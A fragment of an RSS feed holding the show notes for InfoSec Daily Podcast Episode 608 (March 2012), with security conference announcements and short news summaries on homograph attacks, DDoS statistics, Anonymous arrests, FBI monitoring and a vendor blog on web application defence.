	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;https://www.sans.org/20coolestcareers/

#1 Information Security Crime Investigator/Forensics Expert
#2 System, Network, and/or Web Penetration Tester
#3 Forensic Analyst
#4 Incident Responder
#5 Security Architect
#6 Malware Analyst
#7 Network Security Engineer
#8 Security Analyst
#9 Computer Crime Investigator
#10 CISO/ISO or Director of Security
#11 Application Penetration Tester
#12 Security Operations Center Analyst
#13 Prosecutor Specializing in Information Security Crime
#14 Technical Director and Deputy CISO
#15 Intrusion Analyst
#16 Vulnerability Researcher/ Exploit Developer
#17 Security Auditor
#18 Security-savvy Software Developer
#19 Security Maven in an Application Developer Organization
#20 Disaster Recovery/Business Continuity Analyst/Manager
</itunes:summary>
		<itunes:keywords>Podcast</itunes:keywords>
		<itunes:author>Rick Hayes with Dave Kennedy, Boris Sverdlik, Beau Woods, Adrian Crenshaw, Karthik Rangarajan, Geordy Rostad, Themson Mester, and Dr. Bonez.</itunes:author>
		<itunes:explicit>no</itunes:explicit>
		<itunes:block>no</itunes:block>
	</item>
		<item>
		<title>Episode 608 &#8211; Homograph Attack, Longest DDoS, 25 Anonymous Arrest, Op Perfect Hedge, and How Not-to.</title>
		<link>http://www.isdpodcast.com/episode-608-homograph-attack-longest-ddos-25-anonymous-arrest-op-perfect-hedge-and-how-not-to</link>
		<comments>http://www.isdpodcast.com/episode-608-homograph-attack-longest-ddos-25-anonymous-arrest-op-perfect-hedge-and-how-not-to#comments</comments>
		<pubDate>Fri, 02 Mar 2012 02:07:26 +0000</pubDate>
		<dc:creator>rick.hayes</dc:creator>
				<category><![CDATA[Podcast]]></category>

		<guid isPermaLink="false">http://www.isdpodcast.com/?p=3572</guid>
		<description><![CDATA[InfoSec Daily Podcast Episode 608 for March 1, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, and Karthik Rangarajan. &#160; Announcements: Social Engineering Training When: March 5-9, 2012 Where: Seattle, Washington When: July 21-24, 2012 Where: Black Hat Vegas When: August 20-24, 2012 Where: &#160;Bristol, UK When: &#160;November 12-16, 2012 Where: &#160;Columbia, MD [...]]]></description>
			<content:encoded><![CDATA[<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Daily Podcast Episode 608 for March 1, 2012. &nbsp;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, and Karthik Rangarajan.</span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-right: 5pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Announcements:</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Social Engineering Training</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 5-9, 2012<br class="kix-line-break" /><br />
	Where: Seattle, Washington</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21-24, 2012<br class="kix-line-break" /><br />
	Where: Black Hat Vegas</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: August 20-24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: &nbsp;Bristol, UK</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;November 12-16, 2012<br class="kix-line-break" /><br />
	Where: &nbsp;Columbia, MD </span><br />
	<a href="http://www.social-engineer.com/social-engineer-training"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.social-engineer.com/social-engineer-training</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">InfoSec Southwest</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: March 30-April 1</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Austin, TX</span><br />
	<a href="http://www.infosecsouthwest.com/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.Infosecsouthwest.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Linuxfest Northwest 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: Saturday, April 28th-29th, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Bellingham Technical College &#8211; Bellingham, WA</span><br />
	<a href="http://www.linuxfestnorthwest.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.linuxfestnorthwest.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">AIDE 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 21-25, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: MU Forensic Science Center</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Huntington, West Virginia </span><br />
	<a href="http://aide.marshall.edu/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://aide.marshall.edu</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">LayerOne 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: May 26-27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Clarion Hotel &#8211; Anaheim, CA</span><br />
	<a href="http://www.layerone.org/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.layerone.org</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP now open!</span><br />
	&nbsp;</p>
<h5 dir="ltr"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Security 504: Hacker Techniques, Exploits &amp; Incident Handling &#8211; Matt Romanek</span></h5>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: June 20 &#8211; 27, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Courtyard Seattle Federal Way, WA</span><a href="http://www.sans.org/mentor/details.php?nid=28014"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.sans.org/mentor/details.php?nid=28014</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Inside and Out of the Social-Engineer Toolkit (SET)</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 21 &#8211; 22, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 23 &#8211; 24, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Black Hat Vegas</span><br />
	<a href="http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Defcon 20</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: July 26-29, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Rio Hotel and Casino &#8211; Las Vegas, NV</span><br />
	<a href="http://defcon.org/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://defcon.org/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">CFP &amp; Room reservations now open!</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DerbyCon 2012 &#8211; The &ldquo;Deuce&rdquo; Reunion</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">When: &nbsp;September 27-30, 2012</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Where: Louisville, KY</span><br />
	<a href="http://www.derbycon.com/"><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.derbycon.com</span></a></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Thanks to everyone that has purchased products from Amazon through the affiliate program. &nbsp;If you&rsquo;re not familiar with the affiliate program, simply go to</span><a href="../"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> </span><span style="font-size:15px;font-family:Arial;color:#000099;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.isdpodcast.com</span></a><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"> and locate the Affiliate Program link on the right hand side.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><div class="awshortcode-carrousel align&amp;quot;right&amp;quot;"><object type="application/x-shockwave-flash" data="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" width="600" height="200"><param name="movie" value="http://ws.amazon.com/widgets/q?ServiceVersion=20070822&amp;MarketPlace=US&amp;ID=V20070822%2FUS%2Finfdaipod-20%2F8010%2Fea25e3ef-5027-40e4-a56f-ad6cfcd06cb3&amp;Operation=GetDisplayTemplate" /><param name="bgcolor" value="#fff" /><param name="quality" value="high" /><param name="allowscriptaccess" value="always" /><param name="wmode" value="transparent" /><p>You don't have a sufficient version of Flash Player to display this animation.</p></object></div></span><br />
	&nbsp;</p>
<p dir="ltr" style="margin-left: 5pt;margin-right: 5pt;text-indent: -4pt; margin-top: 0pt; margin-bottom: 0pt;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:#ffffff;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">Stories</span></p>
<p><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://www.irongeek.com/homoglyph-attack-generator.php"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.irongeek.com/homoglyph-attack-generator.php</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">A homograph attack is a way a malicious party may deceive computer users about what remote system they are communicating with, by exploiting the fact that many different characters look alike, (i.e., they are homographs, hence the term for the attack). For example, a person frequenting citibank.com may be lured to click the link [сitibank.com] (punycode: xn--itibank-xjg.com/) where the Latin C is replaced with the Cyrillic С.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://news.softpedia.com/news/The-Longest-DDOS-Attack-in-H2-of-2011-Lasted-80-Days-255688.shtml"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://news.softpedia.com/news/The-Longest-DDOS-Attack-in-H2-of-2011-Lasted-80-Days-255688.shtml</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Kaspersky released a report regarding the distributed denial of service (DDOS) attacks that targeted companies in the second half of 2011 and they provided some interesting figures obtained by their botnet monitoring systems.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The numbers reveal that the longest attack recorded in the second half of the past year targeted a travel company and lasted for 80 days, 19 hours, 13 minutes and 5 seconds, and the average duration of DDOS attacks was 9 hours and 29 minutes.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Oddly enough, the largest number of attacks, 384 in number, identified in this period targeted a cybercriminal portal.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The largest attack pushed back by Kaspersky&rsquo;s DDOS Prevention had a power of 600 megabits per second and the average power was determined to be 100 megabits per second, which translates into a 57% increase compared to the first half of 2011.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Experts believe that the many attacks that were directed against the sites of travel companies, more precisely tour agencies, are a result of corporate sabotage. Most of the hits took place during the holiday seasons which may indicate that some companies wanted to make sure that their competitors are temporarily out of business.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">DDOS attacks launched for political reasons also take the podium in the months that passed. Anonymous and other hacktivist collectives relied on such methods to take down government and corporation sites they blamed for doing business in ways that are considered unacceptable by the Internet&rsquo;s protectors.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Other DDOS related elements that left their mark on the last six months of 2011 include the THC-SSL-DOS tool, which allowed for effective attacks to be launched without using large botnets, and the introduction of the LOIC substitute called RefRef.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.wired.com/threatlevel/2012/02/anonymous-arrested-interpol/"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.wired.com/threatlevel/2012/02/anonymous-arrested-interpol/</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Police in four nations arrested 25 alleged participants in the Anonymous collective Tuesday for attacks against websites in Columbia and Chile dating from the middle of 2011.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Officers in Argentina, Chile, Colombia and Spain worked together in &ldquo;Operation Unmask,&rdquo; seizing 250 pieces of equipment, including phones, during searches of 40 locations in 15 cities, according to INTERPOL. The arrestees were between the ages of 17 and 40, but their names and locations were not released.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&ldquo;This operation shows that crime in the virtual world does have real consequences for those involved, and that the Internet cannot be seen as a safe haven for criminal activity, no matter where it originates or where it is targeted,&rdquo; said Bernd Rossbach, Acting INTERPOL Executive Director of Police Services, in the INTERPOL release.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span></p>
<p>	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: &nbsp;</span><a href="http://www.pcadvisor.co.uk/news/security/3341080/fbi-vows-catch-insider-traders-on-facebook-skype"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://www.pcadvisor.co.uk/news/security/3341080/fbi-vows-catch-insider-traders-on-facebook-skype</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">As it launched a campaign fronted by actor Michael Douglas &#8211; who famously played ruthless businessman Gordon Gekko in the &#39;Wall Street&#39; films &#8211; the FBI said it was stepping up Operation Perfect Hedge investigations, which are designed to catch hedge funds and associates involved in illegal trading.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&quot;We will go to whatever lengths we have to, to keep up with changes in technology,&quot; said Richard Jacobs, an FBI special agent, yesterday.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The FBI has been closely examining social media and instant messaging sites in order to collect evidence.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">This is becoming an increasingly widely used tactic, because the FBI is now known to have used recorded phone calls &#8211; such as in the case against Raj Rajaratnam, who was convicted of insider trading last year. The recording of phone calls could prompt insider traders to use alternative channels of communication, observers have noted.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">The FBI last month announced that it planned to develop an application that can track the public&#39;s posts to Facebook, Twitter and other social networks, in order to aid how it predicts and reacts to criminal behaviour, including public disorder and terrorism. Under the plans, it would search keywords of interest and agents would be alerted if the searches come up with evidence of &quot;breaking events, incidents, and emerging threats&quot;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Agents would have the ability to display any information on a map, and they could then add other layers of information, including past incidents and locations of important buildings like embassies and military installations.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&hellip;.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:bold;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Source: </span><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">&nbsp;</span><a href="http://blog.imperva.com/2012/02/how-not-to-stop-an-anonymous-attack.html"><span style="font-size:15px;font-family:Arial;color:#1155cc;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:underline;vertical-align:baseline;">http://blog.imperva.com/2012/02/how-not-to-stop-an-anonymous-attack.html</span></a><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">First, anti-virus is completely useless. &nbsp;As mentioned in our report, Anonymous mimics for-profit methods of hacking. &nbsp;But there are some key exceptions, notably there was no reliance on malware as well as no phishing or spear phishing. &nbsp;This means anti-virus is totally irrelevant.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Second, what about IPS and NGFW vendors who claim to protect applications? &nbsp;Fundamentally, network-based technologies can&rsquo;t be effective when it comes to protecting an application. &nbsp;Don&rsquo;t confuse &ldquo;application aware&rdquo; with actual application protection. &nbsp;Application aware simply means &quot;I know we are using Application X.&quot; &nbsp;But it knows nothing about how the application works to put in place effective defense. &nbsp;Here&rsquo;s one (important) illustration: &nbsp;how do you protect web applications that contain thousands of URLs each with dozens or hundreds of input parameters? &nbsp;IPS may require an equal number of mitigation rules or policies when integrating with scanners, making their management very cumbersome if not impossible. Web applications firewalls (like ours) offer a simpler built-in protection of the entire application through the combined use of positive and negative security models. Through learning of application usage, WAFs know what characters are allowed and supported in every parameter and URL across the application. The impact: &nbsp;A very high number of false negatives.</span><br />
	<span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">Recently, some IPS/NGFW vendors claim that by integrating with vulnerability scanners (like Nikto), you&rsquo;re left sitting pretty. &nbsp;Not so. &nbsp;Why? &nbsp;By integrating the two technologies has several issues:</span></p>
<ul>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">You only protect vulnerabilities you know about which leaves out anything the scanner did not know about.</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">You are not aware of attacks accumulating in parts of the application that were not found to be vulnerable.</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">You are not protected against attacks published after the scan.</span></li>
<li style="list-style-type:disc;font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span style="font-size:15px;font-family:Arial;color:#000000;background-color:transparent;font-weight:normal;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;">You are not protecting resources introduced (or changed) after the scan.</span></li>
</ul>
]]></content:encoded>
			<wfw:commentRss>http://www.isdpodcast.com/episode-608-homograph-attack-longest-ddos-25-anonymous-arrest-op-perfect-hedge-and-how-not-to/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
			<enclosure url="http://www.isdpodcast.com/podpress_trac/feed/3572/0/infosec-daily-podcast-episode-608.mp3" length="17988800" type="audio/mpeg" />
		<itunes:duration>0:37:28</itunes:duration>
		<itunes:subtitle>InfoSec Daily Podcast Episode 608 for March 1, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, and Karthik Rangarajan.
	&#160;
Announcements:
Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
[...]</itunes:subtitle>
		<itunes:summary>InfoSec Daily Podcast Episode 608 for March 1, 2012. &#160;Tonight&#39;s podcast is hosted by Rick Hayes, Adrian Crenshaw, and Karthik Rangarajan.
	&#160;
Announcements:
Social Engineering Training
	When: March 5-9, 2012
	Where: Seattle, Washington
	When: July 21-24, 2012
	Where: Black Hat Vegas
	When: August 20-24, 2012
	Where: &#160;Bristol, UK
	When: &#160;November 12-16, 2012
	Where: &#160;Columbia, MD 
	http://www.social-engineer.com/social-engineer-training
	InfoSec Southwest
	When: March 30-April 1
	Where: Austin, TX
	http://www.Infosecsouthwest.com
	Linuxfest Northwest 2012
	When: Saturday, April 28th-29th, 2012
	Where: Bellingham Technical College &#8211; Bellingham, WA
	http://www.linuxfestnorthwest.org/
	CFP now open!
	AIDE 2012
	When: May 21-25, 2012
	Where: MU Forensic Science Center
	Huntington, West Virginia 
	http://aide.marshall.edu
	LayerOne 2012
	When: May 26-27, 2012
	Where: Clarion Hotel &#8211; Anaheim, CA
	http://www.layerone.org
	CFP now open!
	&#160;
Security 504: Hacker Techniques, Exploits &#38; Incident Handling &#8211; Matt Romanek
When: June 20 &#8211; 27, 2012
	Where: Courtyard Seattle Federal Way, WA http://www.sans.org/mentor/details.php?nid=28014
	Inside and Out of the Social-Engineer Toolkit (SET)
	When: July 21 &#8211; 22, 2012
	When: July 23 &#8211; 24, 2012
	Where: Black Hat Vegas
	http://blackhat.com/html/bh-us-12/training/courses/bh-us-12-training_social_engineer_toolkit.html
	Defcon 20
	When: July 26-29, 2012
	Where: Rio Hotel and Casino &#8211; Las Vegas, NV
	http://defcon.org/
	CFP &#38; Room reservations now open!
	DerbyCon 2012 &#8211; The &#8220;Deuce&#8221; Reunion
	When: &#160;September 27-30, 2012
	Where: Louisville, KY
	http://www.derbycon.com
	Thanks to everyone that has purchased products from Amazon through the affiliate program. &#160;If you&#8217;re not familiar with the affiliate program, simply go to http://www.isdpodcast.com and locate the Affiliate Program link on the right hand side.
	You don't have a sufficient version of Flash Player to display this animation.
	&#160;
Stories
Source: &#160;http://www.irongeek.com/homoglyph-attack-generator.php
